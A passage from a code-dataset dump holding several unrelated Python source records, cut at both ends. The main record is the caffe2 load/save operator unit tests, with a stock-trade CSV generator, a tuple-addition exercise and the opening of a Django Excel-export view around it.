delta.seconds)\n return start + timedelta(days=random_days, seconds=random_seconds)\n\n\n\n\ndef generate():\n np.random.seed(42)\n rows = []\n stocks_holding = {} \n\n start_datetime = datetime(2023, 6, 1)\n end_datetime = datetime(2023, 6, 30)\n\n for i in range(1000):\n Datetime = random_datetime(start_datetime, end_datetime)\n\n stock = np.random.choice(['INFY', 'RELIANCE', 'TCS'])\n\n ordertype = np.random.choice(['Buy', 'Sell'])\n\n if ordertype == 'Buy':\n if stock in stocks_holding:\n\n continue\n else:\n\n quantity = round(np.random.uniform(10, 100))\n stocks_holding[stock] = quantity \n else:\n if stock in stocks_holding:\n\n quantity = stocks_holding[stock]\n stocks_holding.pop(stock) \n else:\n\n continue\n\n if stock == 'INFY':\n price = round(np.random.uniform(1200, 1500), 2)\n\n if stock == 'RELIANCE':\n price = round(np.random.uniform(2000, 3000), 2)\n\n if stock == 'TCS':\n price = round(np.random.uniform(3000, 4000), 2)\n\n exchange = 'NSE'\n rows.append([Datetime, stock, ordertype, price, quantity, exchange])\n\n df = pd.DataFrame(rows, columns=['datetime', 'stock', 'ordertype', 'price', 'quantity', 'Exchange'])\n df = df.sort_values(by='datetime').reset_index(drop=True) # Sort by datetime in increasing order\n df.to_csv('sample_data.csv', index=False)\n\nif(__name__==\"__main__\"):\n generate()\n","repo_name":"rajesh887/Financial_Analyzer-main","sub_path":"Financial_Analyzer-main/sample_data_generator.py","file_name":"sample_data_generator.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38252786359","text":"#!/usr/bin/python3\n\ndef add_tuple(tuple_a=(), tuple_b=()):\n\n tuple_a_extended = tuple_a + (0, 0)\n tuple_b_extended = tuple_b + (0, 0)\n\n # Compute the sum of the first elements and the sum of the second elements\n sum_first = tuple_a_extended[0] + tuple_b_extended[0]\n sum_second = tuple_a_extended[1] + tuple_b_extended[1]\n\n # Return the resulting tuple\n return sum_first, sum_second\n","repo_name":"Avvyyy/alx-higher_level_programming","sub_path":"0x03-python-data_structures/7-add_tuple.py","file_name":"7-add_tuple.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14816441299","text":"import hypothesis.strategies as st\nfrom hypothesis import given, assume, settings\nimport io\nimport math\nimport numpy as np\nimport os\nimport struct\nimport unittest\nfrom pathlib import Path\nfrom typing import Dict, Generator, List, NamedTuple, Optional, Tuple, Type\nfrom caffe2.proto import caffe2_pb2\nfrom caffe2.proto.caffe2_pb2 import BlobSerializationOptions\nfrom caffe2.python import core, test_util, workspace\n\nif workspace.has_gpu_support:\n DEVICES = [caffe2_pb2.CPU, workspace.GpuDeviceType]\n max_gpuid = workspace.NumGpuDevices() - 1\nelse:\n DEVICES = [caffe2_pb2.CPU]\n max_gpuid = 0\n\n\nclass MiniDBEntry(NamedTuple):\n key: str\n value_size: int\n\n\n# Utility class for other loading tests, don't add test functions here\n# Inherit from this test instead. If you add a test here,\n# each derived class will inherit it as well and cause test duplication\nclass TestLoadSaveBase(test_util.TestCase):\n\n def __init__(self, methodName, db_type='minidb'):\n super().__init__(methodName)\n self._db_type = db_type\n\n @settings(deadline=None)\n @given(src_device_type=st.sampled_from(DEVICES),\n src_gpu_id=st.integers(min_value=0, max_value=max_gpuid),\n dst_device_type=st.sampled_from(DEVICES),\n dst_gpu_id=st.integers(min_value=0, max_value=max_gpuid))\n def load_save(self, src_device_type, src_gpu_id,\n dst_device_type, dst_gpu_id):\n workspace.ResetWorkspace()\n dtypes = [np.float16, np.float32, np.float64, bool, np.int8,\n np.int16, np.int32, np.int64, np.uint8, np.uint16]\n arrays = [np.random.permutation(6).reshape(2, 3).astype(T)\n for T in dtypes]\n assume(core.IsGPUDeviceType(src_device_type) or src_gpu_id == 0)\n assume(core.IsGPUDeviceType(dst_device_type) or dst_gpu_id == 0)\n src_device_option = core.DeviceOption(\n src_device_type, src_gpu_id)\n dst_device_option = core.DeviceOption(\n dst_device_type, dst_gpu_id)\n\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.FeedBlob(str(i), arr, src_device_option))\n self.assertTrue(workspace.HasBlob(str(i)))\n\n # Saves the blobs to a local db.\n tmp_folder = self.make_tempdir()\n op = core.CreateOperator(\n \"Save\",\n [str(i) for i in range(len(arrays))], [],\n absolute_path=1,\n db=str(tmp_folder / \"db\"), db_type=self._db_type)\n self.assertTrue(workspace.RunOperatorOnce(op))\n\n # Reset the workspace so that anything we load is surely loaded\n # from the serialized proto.\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n\n def _LoadTest(keep_device, device_type, gpu_id, blobs, loadAll):\n \"\"\"A helper subfunction to test keep and not keep.\"\"\"\n op = core.CreateOperator(\n \"Load\",\n [], blobs,\n absolute_path=1,\n db=str(tmp_folder / \"db\"), db_type=self._db_type,\n device_option=dst_device_option,\n keep_device=keep_device,\n load_all=loadAll)\n self.assertTrue(workspace.RunOperatorOnce(op))\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.HasBlob(str(i)))\n fetched = workspace.FetchBlob(str(i))\n self.assertEqual(fetched.dtype, arr.dtype)\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i)), arr)\n proto = caffe2_pb2.BlobProto()\n proto.ParseFromString(workspace.SerializeBlob(str(i)))\n self.assertTrue(proto.HasField('tensor'))\n self.assertEqual(proto.tensor.device_detail.device_type,\n device_type)\n if core.IsGPUDeviceType(device_type):\n self.assertEqual(proto.tensor.device_detail.device_id,\n gpu_id)\n\n blobs = [str(i) for i in range(len(arrays))]\n # Load using device option stored in the proto, i.e.\n # src_device_option\n _LoadTest(1, src_device_type, src_gpu_id, blobs, 0)\n # Load again, but this time load into dst_device_option.\n _LoadTest(0, dst_device_type, dst_gpu_id, blobs, 0)\n # Load back to the src_device_option to see if both paths are able\n # to reallocate memory.\n _LoadTest(1, src_device_type, src_gpu_id, blobs, 0)\n # Reset the workspace, and load directly into the dst_device_option.\n workspace.ResetWorkspace()\n _LoadTest(0, dst_device_type, dst_gpu_id, blobs, 0)\n\n # Test load all which loads all blobs in the db into the workspace.\n workspace.ResetWorkspace()\n _LoadTest(1, src_device_type, src_gpu_id, [], 1)\n # Load again making sure that overwrite functionality works.\n _LoadTest(1, src_device_type, src_gpu_id, [], 1)\n # Load again with different device.\n _LoadTest(0, dst_device_type, dst_gpu_id, [], 1)\n workspace.ResetWorkspace()\n _LoadTest(0, dst_device_type, dst_gpu_id, [], 1)\n workspace.ResetWorkspace()\n _LoadTest(1, src_device_type, src_gpu_id, blobs, 1)\n workspace.ResetWorkspace()\n _LoadTest(0, dst_device_type, dst_gpu_id, blobs, 1)\n\n def saveFile(\n self, tmp_folder: Path, db_name: str, db_type: str, start_blob_id: int\n ) -> Tuple[str, List[np.ndarray]]:\n dtypes = [np.float16, np.float32, np.float64, bool, np.int8,\n np.int16, np.int32, np.int64, np.uint8, np.uint16]\n arrays = [np.random.permutation(6).reshape(2, 3).astype(T)\n for T in dtypes]\n\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.FeedBlob(str(i + start_blob_id), arr))\n self.assertTrue(workspace.HasBlob(str(i + start_blob_id)))\n\n # Saves the blobs to a local db.\n tmp_file = str(tmp_folder / db_name)\n op = core.CreateOperator(\n \"Save\",\n [str(i + start_blob_id) for i in range(len(arrays))], [],\n absolute_path=1,\n db=tmp_file, db_type=db_type)\n workspace.RunOperatorOnce(op)\n return tmp_file, arrays\n\n\nclass TestLoadSave(TestLoadSaveBase):\n\n def testLoadSave(self):\n self.load_save()\n\n def testRepeatedArgs(self):\n dtypes = [np.float16, np.float32, np.float64, bool, np.int8,\n np.int16, np.int32, np.int64, np.uint8, np.uint16]\n arrays = [np.random.permutation(6).reshape(2, 3).astype(T)\n for T in dtypes]\n\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.FeedBlob(str(i), arr))\n self.assertTrue(workspace.HasBlob(str(i)))\n\n # Saves the blobs to a local db.\n tmp_folder = self.make_tempdir()\n op = core.CreateOperator(\n \"Save\",\n [str(i) for i in range(len(arrays))] * 2, [],\n absolute_path=1,\n db=str(tmp_folder / \"db\"), db_type=self._db_type)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testLoadExcessblobs(self):\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))] * 2,\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=False)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(len(arrays) + i) for i in [-1, 0]],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.ResetWorkspace()\n workspace.RunOperatorOnce(op)\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(len(arrays) + i) for i in range(2)],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.ResetWorkspace()\n workspace.RunOperatorOnce(op)\n\n def testTruncatedFile(self):\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n with open(tmp_file, 'wb+') as fdest:\n fdest.seek(20, os.SEEK_END)\n fdest.truncate()\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=False)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n op = core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testBlobNameOverrides(self):\n original_names = ['blob_a', 'blob_b', 'blob_c']\n new_names = ['x', 'y', 'z']\n blobs = [np.random.permutation(6) for i in range(3)]\n for i, blob in enumerate(blobs):\n self.assertTrue(workspace.FeedBlob(original_names[i], blob))\n self.assertTrue(workspace.HasBlob(original_names[i]))\n self.assertEqual(len(workspace.Blobs()), 3)\n\n # Saves the blobs to a local db.\n tmp_folder = self.make_tempdir()\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Save\", original_names, [],\n absolute_path=1,\n strip_prefix='.temp',\n blob_name_overrides=new_names,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type\n )\n )\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Save\", original_names, [],\n absolute_path=1,\n blob_name_overrides=new_names,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type\n )\n )\n )\n self.assertTrue(workspace.ResetWorkspace())\n self.assertEqual(len(workspace.Blobs()), 0)\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\", [], [],\n absolute_path=1,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type,\n load_all=1\n )\n )\n )\n self.assertEqual(len(workspace.Blobs()), 3)\n for i, name in enumerate(new_names):\n self.assertTrue(workspace.HasBlob(name))\n self.assertTrue((workspace.FetchBlob(name) == blobs[i]).all())\n # moved here per @cxj's suggestion\n load_new_names = ['blob_x', 'blob_y', 'blob_z']\n # load 'x' into 'blob_x'\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\", [], load_new_names[0:1],\n absolute_path=1,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type,\n source_blob_names=new_names[0:1]\n )\n )\n )\n # we should have 'blob_a/b/c/' and 'blob_x' now\n self.assertEqual(len(workspace.Blobs()), 4)\n for i, name in enumerate(load_new_names[0:1]):\n self.assertTrue(workspace.HasBlob(name))\n self.assertTrue((workspace.FetchBlob(name) == blobs[i]).all())\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\", [], load_new_names[0:3],\n absolute_path=1,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type,\n source_blob_names=new_names[0:3]\n )\n )\n )\n # we should have 'blob_a/b/c/' and 'blob_x/y/z' now\n self.assertEqual(len(workspace.Blobs()), 6)\n for i, name in enumerate(load_new_names[0:3]):\n self.assertTrue(workspace.HasBlob(name))\n self.assertTrue((workspace.FetchBlob(name) == blobs[i]).all())\n\n def testMissingFile(self):\n tmp_folder = self.make_tempdir()\n tmp_file = tmp_folder / \"missing_db\"\n\n op = core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n db=str(tmp_file), db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n try:\n workspace.RunOperatorOnce(op)\n except RuntimeError as e:\n print(e)\n raise\n\n def testLoadMultipleFilesGivenSourceBlobNames(self):\n tmp_folder = self.make_tempdir()\n db_file_1, arrays_1 = self.saveFile(tmp_folder, \"db1\", self._db_type, 0)\n db_file_2, arrays_2 = self.saveFile(\n tmp_folder, \"db2\", self._db_type, len(arrays_1)\n )\n db_files = [db_file_1, db_file_2]\n blobs_names = [str(i) for i in range(len(arrays_1) + len(arrays_2))]\n\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\",\n [], blobs_names,\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n source_blob_names=blobs_names\n )\n )\n )\n self.assertEqual(len(workspace.Blobs()), len(blobs_names))\n for i in range(len(arrays_1)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i)), arrays_1[i]\n )\n for i in range(len(arrays_2)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i + len(arrays_1))), arrays_2[i]\n )\n\n def testLoadAllMultipleFiles(self):\n tmp_folder = self.make_tempdir()\n db_file_1, arrays_1 = self.saveFile(tmp_folder, \"db1\", self._db_type, 0)\n db_file_2, arrays_2 = self.saveFile(\n tmp_folder, \"db2\", self._db_type, len(arrays_1)\n )\n db_files = [db_file_1, db_file_2]\n\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=True\n )\n )\n )\n self.assertEqual(len(workspace.Blobs()), len(arrays_1) + len(arrays_2))\n for i in range(len(arrays_1)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i)), arrays_1[i]\n )\n for i in range(len(arrays_2)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i + len(arrays_1))), arrays_2[i]\n )\n\n def testLoadAllMultipleFilesWithSameKey(self):\n tmp_folder = self.make_tempdir()\n db_file_1, arrays_1 = self.saveFile(tmp_folder, \"db1\", self._db_type, 0)\n db_file_2, arrays_2 = self.saveFile(tmp_folder, \"db2\", self._db_type, 0)\n\n db_files = [db_file_1, db_file_2]\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n op = core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testLoadRepeatedFiles(self):\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n db_files = [tmp_file, tmp_file]\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=False)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testLoadWithDBOptions(self) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n db_files = [tmp_file, tmp_file]\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n\n db_options = b\"test_db_options\"\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=False,\n db_options=db_options,\n )\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def create_test_blobs(\n self, size: int = 1234, feed: bool = True\n ) -> List[Tuple[str, np.ndarray]]:\n def int_array(dtype: Type[np.integer], size: int) -> np.ndarray:\n info = np.iinfo(dtype)\n return np.random.randint(info.min, info.max, size, dtype=dtype)\n\n def float_array(dtype: Type[np.floating], size: int) -> np.ndarray:\n return np.random.random_sample(size).astype(dtype)\n\n blobs = [\n (\"int8_data\", int_array(np.int8, size)),\n (\"int16_data\", int_array(np.int16, size)),\n (\"int32_data\", int_array(np.int32, size)),\n (\"int64_data\", int_array(np.int64, size)),\n (\"uint8_data\", int_array(np.uint8, size)),\n (\"uint16_data\", int_array(np.uint16, size)),\n (\"float16_data\", float_array(np.float16, size)),\n (\"float32_data\", float_array(np.float32, size)),\n (\"float64_data\", float_array(np.float64, size)),\n ]\n\n if feed:\n for name, data in blobs:\n workspace.FeedBlob(name, data)\n\n return blobs\n\n def load_blobs(\n self,\n blob_names: List[str],\n dbs: List[str],\n db_type: Optional[str] = None\n ) -> None:\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n load_op = core.CreateOperator(\n \"Load\",\n [],\n blob_names,\n absolute_path=1,\n dbs=dbs,\n db_type=db_type or self._db_type,\n )\n self.assertTrue(workspace.RunOperatorOnce(load_op))\n self.assertEqual(len(workspace.Blobs()), len(blob_names))\n\n def load_and_check_blobs(\n self,\n blobs: List[Tuple[str, np.ndarray]],\n dbs: List[str],\n db_type: Optional[str] = None\n ) -> None:\n self.load_blobs([name for name, data in blobs], dbs, db_type)\n for name, data in blobs:\n np.testing.assert_array_equal(workspace.FetchBlob(name), data)\n\n def _read_minidb_entries(\n self, path: Path\n ) -> Generator[MiniDBEntry, None, None]:\n \"\"\"Read the entry information out of a minidb file.\n \"\"\"\n header = struct.Struct(\"=ii\")\n with path.open(\"rb\") as f:\n while True:\n buf = f.read(header.size)\n if not buf:\n break\n if len(buf) < header.size:\n raise Exception(\"early EOF in minidb header\")\n (key_len, value_len) = header.unpack(buf)\n if key_len < 0 or value_len < 0:\n raise Exception(\n f\"invalid minidb header: ({key_len}, {value_len})\"\n )\n key = f.read(key_len)\n if len(key) < key_len:\n raise Exception(\"early EOF in minidb key\")\n f.seek(value_len, io.SEEK_CUR)\n yield MiniDBEntry(key=key.decode(\"utf-8\"), value_size=value_len)\n\n def _read_chunk_info(self, path: Path) -> Dict[str, List[MiniDBEntry]]:\n \"\"\"Read a minidb file and return the names of each blob and how many\n chunks are stored for that blob.\n \"\"\"\n chunk_id_separator = \"#%\"\n results: Dict[str, List[MiniDBEntry]] = {}\n for entry in self._read_minidb_entries(path):\n parts = entry.key.rsplit(chunk_id_separator, 1)\n if len(parts) == 0:\n assert entry.key not in results\n results[entry.key] = [entry]\n else:\n blob_name = parts[0]\n results.setdefault(blob_name, [])\n results[blob_name].append(entry)\n\n return results\n\n def _test_save_with_chunk_size(\n self, num_elems: int, chunk_size: int, expected_num_chunks: int,\n ) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n blobs = self.create_test_blobs(num_elems)\n\n # Saves the blobs to a local db.\n save_op = core.CreateOperator(\n \"Save\",\n [name for name, data in blobs],\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n chunk_size=chunk_size,\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n self.load_and_check_blobs(blobs, [tmp_file])\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n for blob_name, chunks in blob_chunks.items():\n self.assertEqual(len(chunks), expected_num_chunks)\n\n def testSaveWithChunkSize(self) -> None:\n num_elems = 1234\n chunk_size = 32\n expected_num_chunks = math.ceil(num_elems / chunk_size)\n self._test_save_with_chunk_size(\n num_elems=num_elems,\n chunk_size=chunk_size,\n expected_num_chunks=expected_num_chunks,\n )\n\n def testSaveWithDefaultChunkSize(self) -> None:\n # This is the default value of the --caffe2_tensor_chunk_size flag from\n # core/blob_serialization.cc\n #\n # Test with just slightly more than this to ensure that 2 chunks are\n # used.\n default_chunk_size = 1000000\n self._test_save_with_chunk_size(\n num_elems=default_chunk_size + 10,\n chunk_size=-1,\n expected_num_chunks=2,\n )\n\n def testSaveWithNoChunking(self) -> None:\n default_chunk_size = 1000000\n self._test_save_with_chunk_size(\n num_elems=default_chunk_size + 10,\n chunk_size=0,\n expected_num_chunks=1,\n )\n\n def testSaveWithOptions(self) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n num_elems = 1234\n blobs = self.create_test_blobs(num_elems)\n\n # Saves the blobs to a local db.\n save_op = core.CreateOperator(\n \"Save\",\n [name for name, data in blobs],\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n chunk_size=40,\n options=caffe2_pb2.SerializationOptions(\n options=[\n BlobSerializationOptions(\n blob_name_regex=\"int16_data\", chunk_size=10\n ),\n BlobSerializationOptions(\n blob_name_regex=\".*16_data\", chunk_size=20\n ),\n BlobSerializationOptions(\n blob_name_regex=\"float16_data\", chunk_size=30\n ),\n ],\n ),\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n self.load_and_check_blobs(blobs, [tmp_file])\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n # We explicitly set a chunk_size of 10 for int16_data\n self.assertEqual(\n len(blob_chunks[\"int16_data\"]), math.ceil(num_elems / 10)\n )\n # uint16_data should match the .*16_data pattern, and get a size of 20\n self.assertEqual(\n len(blob_chunks[\"uint16_data\"]), math.ceil(num_elems / 20)\n )\n # float16_data should also match the .*16_data pattern, and get a size\n # of 20. The explicitly float16_data rule came after the .*16_data\n # pattern, so it has lower precedence and will be ignored.\n self.assertEqual(\n len(blob_chunks[\"float16_data\"]), math.ceil(num_elems / 20)\n )\n # int64_data will get the default chunk_size of 40\n self.assertEqual(\n len(blob_chunks[\"int64_data\"]), math.ceil(num_elems / 40)\n )\n\n\n def testSaveWithDBOptions(self) -> None:\n num_elems = 1234\n chunk_size = 32\n expected_num_chunks = math.ceil(num_elems / chunk_size)\n\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n blobs = self.create_test_blobs(num_elems)\n\n db_options = b\"test_db_options\"\n # Saves the blobs to a local db.\n save_op = core.CreateOperator(\n \"Save\",\n [name for name, data in blobs],\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n chunk_size=chunk_size,\n db_options=db_options,\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n self.load_and_check_blobs(blobs, [tmp_file])\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n for blob_name, chunks in blob_chunks.items():\n self.assertEqual(len(chunks), expected_num_chunks)\n\n def testSaveFloatToBfloat16(self) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n # Create 2 blobs with the same float data\n float_data = np.random.random_sample(4000).astype(np.float32)\n workspace.FeedBlob(\"float1\", float_data)\n workspace.FeedBlob(\"float2\", float_data)\n blob_names = [\"float1\", \"float2\"]\n\n # Serialize the data, using bfloat16 serialization for one of the blobs\n save_op = core.CreateOperator(\n \"Save\",\n blob_names,\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n options=caffe2_pb2.SerializationOptions(\n options=[\n BlobSerializationOptions(\n blob_name_regex=\"float1\",\n float_format=BlobSerializationOptions.FLOAT_BFLOAT16,\n ),\n ],\n ),\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n # As long as fbgemm was available for us to perform bfloat16 conversion,\n # the serialized data for float1 should be almost half the size of float2\n if workspace.has_fbgemm:\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n self.assertEqual(len(blob_chunks[\"float1\"]), 1, blob_chunks[\"float1\"])\n self.assertEqual(len(blob_chunks[\"float2\"]), 1, blob_chunks[\"float2\"])\n self.assertLess(\n blob_chunks[\"float1\"][0].value_size,\n 0.6 * blob_chunks[\"float2\"][0].value_size\n )\n\n self.load_blobs(blob_names, [tmp_file])\n\n # float2 should be exactly the same as the input data\n np.testing.assert_array_equal(workspace.FetchBlob(\"float2\"), float_data)\n # float2 should be close-ish to the input data\n np.testing.assert_array_almost_equal(\n workspace.FetchBlob(\"float1\"), float_data, decimal=2\n )\n\n def testEstimateBlobSizes(self) -> None:\n # Create some blobs to test with\n float_data = np.random.random_sample(4000).astype(np.float32)\n workspace.FeedBlob(\"float1\", float_data)\n workspace.FeedBlob(\"float2\", float_data)\n workspace.FeedBlob(\n \"float3\", np.random.random_sample(2).astype(np.float32)\n )\n workspace.FeedBlob(\n \"ui16\", np.random.randint(0, 0xffff, size=1024, dtype=np.uint16)\n )\n\n # Estimate the serialized size of the data.\n # Request bfloat16 serialization for one of the float blobs, just to\n # exercise size estimation when using this option.\n options = caffe2_pb2.SerializationOptions(\n options=[\n BlobSerializationOptions(\n blob_name_regex=\"float1\",\n float_format=BlobSerializationOptions.FLOAT_BFLOAT16,\n chunk_size=500,\n ),\n ],\n )\n get_blobs_op = core.CreateOperator(\n \"EstimateAllBlobSizes\",\n [],\n [\"blob_names\", \"blob_sizes\"],\n options=options,\n )\n self.assertTrue(workspace.RunOperatorOnce(get_blobs_op))\n blob_names = workspace.FetchBlob(\"blob_names\")\n blob_sizes = workspace.FetchBlob(\"blob_sizes\")\n\n sizes_by_name: Dict[str, int] = {}\n for idx, name in enumerate(blob_names):\n sizes_by_name[name.decode(\"utf-8\")] = blob_sizes[idx]\n\n # Note that the output blob list will include our output blob names.\n expected_blobs = [\n \"float1\", \"float2\", \"float3\", \"ui16\",\n \"blob_names\", \"blob_sizes\"\n ]\n self.assertEqual(set(sizes_by_name.keys()), set(expected_blobs))\n\n def check_expected_blob_size(\n name: str, num_elems: int, elem_size: int, num_chunks: int = 1\n ) -> None:\n # The estimation code applies a fixed 40 byte per-chunk overhead to\n # account for the extra space required for other fixed TensorProto\n # message fields.\n per_chunk_overhead = 50\n expected_size = (\n (num_chunks * (len(name) + per_chunk_overhead))\n + (num_elems * elem_size)\n )\n self.assertEqual(\n sizes_by_name[name],\n expected_size,\n f\"expected size mismatch for {name}\"\n )\n\n check_expected_blob_size(\"ui16\", 1024, 3)\n check_expected_blob_size(\"float2\", 4000, 4)\n check_expected_blob_size(\"float3\", 2, 4)\n\n # Our serialization options request to split float1 into 500-element\n # chunks when saving it. If fbgemm is available then the float1 blob\n # will be serialized using 2 bytes per element instead of 4 bytes.\n float1_num_chunks = 4000 // 500\n if workspace.has_fbgemm:\n check_expected_blob_size(\"float1\", 4000, 2, float1_num_chunks)\n else:\n check_expected_blob_size(\"float1\", 4000, 4, float1_num_chunks)\n\n check_expected_blob_size(\"blob_names\", len(expected_blobs), 50)\n check_expected_blob_size(\"blob_sizes\", len(expected_blobs), 8)\n\n # Now actually save the blobs so we can compare our estimates\n # to how big the serialized data actually is.\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n save_op = core.CreateOperator(\n \"Save\",\n list(sizes_by_name.keys()),\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n options=options,\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n saved_sizes: Dict[str, int] = {}\n for blob_name, chunks in blob_chunks.items():\n total_size = sum(chunk.value_size for chunk in chunks)\n saved_sizes[blob_name] = total_size\n\n # For sanity checking, ensure that our estimates aren't\n # extremely far off\n for name in expected_blobs:\n estimated_size = sizes_by_name[name]\n saved_size = saved_sizes[name]\n difference = abs(estimated_size - saved_size)\n error_pct = 100.0 * (difference / saved_size)\n print(\n f\"{name}: estimated={estimated_size} actual={saved_size} \"\n f\"error={error_pct:.2f}%\"\n )\n # Don't check the blob_names blob. It is a string tensor, and we\n # can't estimate string tensor sizes very well without knowing the\n # individual string lengths. (Currently it requires 102 bytes to\n # save, but we estimate 360).\n if name == \"blob_names\":\n continue\n # Check that we are within 100 bytes, or within 25%\n # We are generally quite close for tensors with fixed-width fields\n # (like float), but a little farther off for tensors that use varint\n # encoding.\n if difference > 100:\n self.assertLess(error_pct, 25.0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/operator_test/load_save_test.py","file_name":"load_save_test.py","file_ext":"py","file_size_in_byte":33210,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"3580082648","text":"#Vista genérica para mostrar resultados\nfrom django.views.generic.base import TemplateView\n#Workbook nos permite crear libros en excel\nfrom openpyxl import Workbook\nfrom openpyxl.styles import colors\nfrom openpyxl.styles import Font, Color,Fill,PatternFill\nfrom openpyxl.cell import Cell\nfrom openpyxl.worksheet.properties import WorksheetProperties, PageSetupProperties\n#Nos devuelve un objeto resultado, en este caso un archivo de excel\n\nfrom django.http.response import HttpResponse\nfrom .models import *\nfrom django.db.models import Sum, Count\nfrom django.utils import timezone\nimport datetime\nfrom django.db import connection\nimport pytz #para poder hacer la suma de los campos\nfrom django.db.models import Q #para poder usar el operador | que funciona como OR\nfrom django.db.models import F\n\ndef ValuesQuerySetToDict(vqs):\n return [item for item in vqs]\n\ndef 